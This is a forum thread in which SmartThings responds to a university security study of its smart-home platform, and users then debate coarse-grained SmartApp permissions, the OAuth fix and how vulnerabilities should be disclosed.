SmartThings Platform Security - Response from Alex

Protecting our customers’ privacy and data security is fundamental to everything we do at SmartThings. We regularly perform penetration tests of our system and engage with professional third-party security experts. We embrace their research so that we can continue to get in front of any potential vulnerabilities, and be industry leaders when it comes to the security of our platform.

A research report entitled “Security Analysis of Emerging Smart Home Applications” was released this morning by a team from the University of Michigan and Microsoft Research. The report discloses hypothetical vulnerabilities in the SmartThings platform and demonstrates how, under certain circumstances, they could be exploited.

It is important to note that none of the vulnerabilities described have affected any of our customers thanks to the SmartApp approval processes that we have in place. Over the past several weeks, we have been working with this research team and have also already implemented a number of updates to further protect against the potential vulnerabilities disclosed in the report.

Specific enhancements we have already implemented include:

  • Modifying the SmartThings platform to ensure that only “Published” OAuth SmartApps can be installed into customer accounts, through the OAuth method. Published SmartApps are those that have undergone a complete source code security review by SmartThings to ensure that the application does only what it advertises as its purpose – and contains no malicious code.

  • Updating our best practices for development of SmartApps that expose web services, and mobile applications that integrate with the SmartThings platform. We are working with our third-party developer partners to ensure that all partners follow these best practices to avoid any potential vulnerabilities.

  • In all cases, we have strengthened our source code review processes and believe in its efficacy, but are also working to update the underlying platform to systematically prevent these potential vulnerabilities in the future.

As an open platform with a growing and active developer community, SmartThings provides detailed guidelines on how to keep all code secure, and to determine what is a trusted source. Code downloaded from an untrusted source can present a potential risk – just like when a PC user installs software from an unknown third-party website where there’s a risk that software may contain malicious code.

Even though current customers have not been impacted, we take the recommendations of Mr. Fernandes, Dr. Jung, and Dr. Prakash extremely seriously and are grateful for all opportunities to continue to improve the security of our platform.

Let us know any questions you’ve got here and we’ll be ready to dig further into the details.



I have posted a response from the perspective of SmartTiles as a comment on @Alex’s blog entry:


How does this impact Rule Machine for those of us that still have it? :sweat:

I don’t believe it has any impact on RM.

1 Like

This is only with respect to the OAuth changes linked above. If the app is not installed through the OAuth method it is not impacted at all.


Thanks @slagle . I guess I was ignorant to what OAuth is or was. All I knew was RM didn’t get reviewed by ST so had me worried. :slight_smile:


Unless I’m misunderstanding this, the published videos of the various attacks indicate that a common issue is lack of fine grained access controls based on the defined capabilities of an installed smartapp. So they created an application that seemingly only requests capability.battery but were able to intercept/send raw z-wave commands to sniff/set user codes on an associated device? Why should such an application be permitted to do anything but read the battery level of the permitted device(s)? While I certainly understand the implications of something like this being far more severe with OAuth-based apps for when a user is blindly trusting the developer, wouldn’t such this carry over for users who just copy/paste community code blindly into their IDE?

Is the real issue that developers are improperly defining the requirements that their application needs to function and/or is it an access control bypass being exploited?

1 Like

You understand the problem correctly.

It’s not a bug, it is a missing feature; ie., this has never been hidden, it has always been working per specifications and/or documentation.

The preferences input function uses Capability solely as a Device selection filter, not as a way to define and restrict granular access to specific functions (Attributes, Commands, Events) from the Device. This may have been on the wishlist, but was never implemented. Thus, not a bug — I don’t even think it should be called an “exploit”, because it is not a hidden vulnerability; (except for the lack of Customer education?).

Similarly, the Location Object is fully open to any installed SmartApp, because no preferences/input statement is required for the app to use it. I raised this concern multiple times including a simple practical fix (make “Location” or its functions a type of Device / Capability). location.mode (and SHM mode) is sensitive functionality since it is often used to arm/disarm alarms, right? So giving a Battery Monitor SmartApp the right to use it should require explicit user permission, otherwise only a code review can prove that any SmartApp is not changing your Mode and disarming your home!

The issue with Device function granularity can be mitigated with the use of Virtual Device Types and instances… For example, you could create twp separate devices of type Unlock and Lock with distinct properties. If the platform had a simple inheritance paradigm, this structure might even be practical.

Maybe this can be done with abstraction under the covers, but it gets super complicated because ad hoc Attributes, Commands, and Events (ie, those not in an official Capability) will also need to be presented in an understandable granular fashion to users. Gets confusing for the average consumer really quickly.


Gotcha, thanks for the insight. I guess this is just another reminder that security is always an afterthought (not directed at ST specifically, just software in general). While it may not qualify as a “bug” simply because the separation never existed in the first place, I don’t think there is any doubt as to this being undesirable behavior for a product for which one of its use cases is marketed as home security. Next time $relative clicks on the wrong link, I don’t want to have to clean the malware off their machine AND make sure there are no extra codes hidden in the front door.

No doubt walking the line between usability and security is a slippery slope. Virtual devices as a mitigation technique is way too complicated for the average user…hell, I would prefer not to deal with them as a technical one :slight_smile:


Recent Android releases (MM?) have improved the granular access control request mechanism – or so I think. I believe that Apps can now be set not to ask for a permission until it is actually used (?).

Still – How much do you want to bet that over 80% of Android users completely ignore (and blindly “Accept All”) the list of permission requests presented to them when they install an App from the Play Store?

Why would a SmartThings Customer be any different? The research paper misses the point: Users do not understand granular access control. Malicious SmartApp installation is much more an education problem than anything else – unless SmartThings can come up with a way to arbitrarily decide what a SmartApp that is called “Battery Monitor” should and should not have access to. … i.e., that’s an easy strawman example. So what about a SmartApp called “SmartTiles” or “Smart Alarm” or “Smart Rules”? Must the user check dozens of boxes to grant the wide range of permissions these apps genuinely, reasonably and legitimately require?

1 Like

You are being kind with that 80% number. People are very trusting by nature and will install pretty much anything, expecting the app to play nice.

However, in this case there is not even a courtesy notification that access is wide open and the app can access anything and everything in the platform. Whats worse is that the app is not even limited in scope to what is on the hub itself. It can issue a call into the cloud to send out information or use a hubaction to gain access to other devices on your local network. (the possibilities are endless to an inventive hacker). This is true for apps i install myself as well as apps/devices that have been “reviewed” by ST. And, even though there is additional value in the ST review of the app, if you think about it, there really is no reason we should trust that a ST employee has not made a mistake in the review, they are only human.

1 Like

I totally agree that typical users have zero understanding of what they’re actually doing when they click yes/allow buttons other than that’s usually what solves their problem, but at least they were given the opportunity to think twice before doing something stupid. I am immediately reminded of the way Firefox handles SSL certificate errors requiring 3 clicks by the user to try and convince them it’s a bad idea to proceed before presenting the page behind it which many thought was ridiculous at the time. I hope you’re not saying that simply because the average user doesn’t know any better that it’s a valid excuse for applications to be allowed to misbehave for the purpose of simplicity. I do get where you’re coming from given the nature of SmartTiles and it would be burdensome for a user to click an allow button 200 times to get their tiles working, but there’s obviously a middle ground. At the end of the day, there is no excuse for an arbitrary application to have the capability to, in your example, disarm SHM. This has little to nothing to do with the items called out in the OP and it seems the biggest security issue is the one barely even mentioned. I’m curious to see what safeguards are being considered to address these.

The problem here depends on the definition of “misbehave”.

If you give your neighbor a physical key to your front door, they will be able to lock and unlock it whenever and for whatever reason they wish.

I’m sure you gave them the key for “emergencies” only… But is running out of bus fare an “emergency” that justifies using the key to come in and “borrow” some cash from the swear jar?

People give and understand vague or ambiguous instructions. Computers don’t… Yet.

To reduce the risk exposure of the neighbor with the key, you could station a Security Guard in your home who has been given a very clear definition of what is a valid “emergency”, and prevents the neighbor from entering and/or from accessing your piggy bank.

Sure, SmartThings can provide the Security Guard, but the user must still give him/her very precise instructions. Since the guard here is a computer program, the instructions must be 100% precise. So anything not permitted is “misbehaving”.

SmartThings didn’t / doesn’t provide the security guard. If you give a SmartApp your front door lock, it can do anything with that lock and who knows what that leads to, right? SmartThings may have considered it sufficient to have a long interview (code review) of the neighbor to make sure she/it is incapable of misbehaving… Abusing the trust you put in her/it.

Frankly, until the last decade or so, this was the de facto and ubiquitous paradigm; access control granularity at the feature by feature or function by function of a PC wasn’t considered necessary… But came about with the rise of smartphones and Apps.

But SmartThings was designed 4 years ago: They should have known and done better.

Is there some reason that select Community members and prominent Developers were not informed of this research sooner? (i.e., besides the obvious risks of disclosure, but … ?).

Actually, why did Community and all Customers, actually, have to wait to find this out in the media instead of being notified through SmartThings’s own channels ahead of the press-release?

some checkbox or option somewhere for critical devices like locks, mode change etc. would be usefull then at least the user couldn’t feint ignorance .

1 Like

You ask the same question in another thread, so I’ll just point to my answer there, but this is standard industry practice.


Yup… That Topic has become derailed somewhat; lots of dog memes!

There doesn’t seem to be a single industry standard for vulnerability discovery disclosure, though there are some common themes.

The condition that the “discoverer” should have the right of first-publication seems to be in a grey area, ethically speaking as far as I am concerned. While researchers and media “earn” some benefits to using a cooperative disclosure arrangement, I think vendors/companies also deserve the right to inform customers (and platform/community developers) prior to possibly confusing media frenzy.

This isn’t the place to discuss disclosure policies in detail, but I found a random (and dated 2005) student paper that compares various options, which folks who are interested might glance at, and we should spinoff a Topic for discussion?

Page 18:

If you’ve installed any SmartApps into your SmartThings ecosystem, you are at risk.

I’m surprised to see relatively little coverage of the University of Michigan study into the SmartThings ecosystem and the inherent security flaws in the ecosystem.

We are all trusting various aspects of our home security, privacy, and living conditions to our Internet of Things. Having garage doors, door locks, cameras, door sensors, and lights attached to the ecosystem puts everyone at risk until these issues are addressed, or mitigated.

Here is a good overview:

The full study from the University of Michigan may be found here:

The paper is here:

Additionally, Steve Gibson, a well-known security professional that hosts the “Security Now” podcast on the TWiT network, devoted the bulk of one of his episodes to it recently, the episode may be found here:

The transcript may be found here:

Finally, the last two pages of Steve’s show notes do a great job summarizing the issue:

Hope this helps. Steve also then followed up the episode with one on Zwave issues the next week:


It’s not getting the attention because the issue is highly overblown. Of course there exists the possibility of a security hole when the ecosystem allows you to paste raw source code and create your own app. You can just as easily copy and paste VBScript on a Windows PC and allow a trojan in just the same,

The oAuth issue was legit, but it’s fixed. Case closed as far as I’m concerned.


the real issue is that unless ST ban anything but zigbee 3.0 there will always be an issue - effectively rendering any device < zigbeee 3.0 worthless as I doubt they implemented an update function for majority of the devices … so they will always require compatibility OR people need to upgrade their device when zigbee 3.0 devices become available … trade off or sinkhole …